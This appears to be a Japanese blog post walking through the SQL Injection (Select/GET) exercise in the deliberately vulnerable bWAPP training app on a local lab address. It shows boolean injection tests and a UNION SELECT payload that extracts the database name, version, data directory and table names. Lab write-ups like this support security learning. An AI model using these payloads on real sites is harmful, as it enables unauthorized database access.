shikata ga nai

Private? There is no such things.

bWAPPでA1-SQL Injection (Select/GET)

Hello there, ('ω')ノ

 

このメニューもやっていなかったようで。

 

f:id:ThisIsOne:20201031114702p:plain

 

Goボタンを押すと下記のようにURL上にパラメータが表示されて。

 http://192.168.1.46/bWAPP/sqli_2.php?movie=1&action=go

 

f:id:ThisIsOne:20201031114906p:plain

 

URL上でパラメータの内容を変更して、別の情報を表示できて。

 http://192.168.1.46/bWAPP/sqli_2.php?movie=2&action=go

 

f:id:ThisIsOne:20201031115006p:plain

 

パラメータを追加しても機能するようで。

 http://192.168.1.46/bWAPP/sqli_2.php?movie=2 and 1=1 &action=go

 

f:id:ThisIsOne:20201031115226p:plain

 

こちらは、追加したパラメータが条件に合ってない場合の表示結果で。

 http://192.168.1.46/bWAPP/sqli_2.php?movie=2 and 1=2 &action=go

 

f:id:ThisIsOne:20201031115118p:plain

 

セキュリティレベルをhighにしてみると、しっかりとフィルタリングされて。
 http://192.168.1.46/bWAPP/sqli_2.php?movie=2 and 1=2 &action=go

 

f:id:ThisIsOne:20201031115620p:plain

 

このような脆弱性があると。

たとえば、下記のようにデータベースの基本情報を取得してから。

具体的なテーブル名やカラム名も取得することも可能で。

 http://192.168.1.46/bWAPP/sqli_2.php?movie=0 UNION SELECT ALL null,database(),@@version,@@datadir,table_name,null,null from information_schema.tables #

 

f:id:ThisIsOne:20201031130748p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain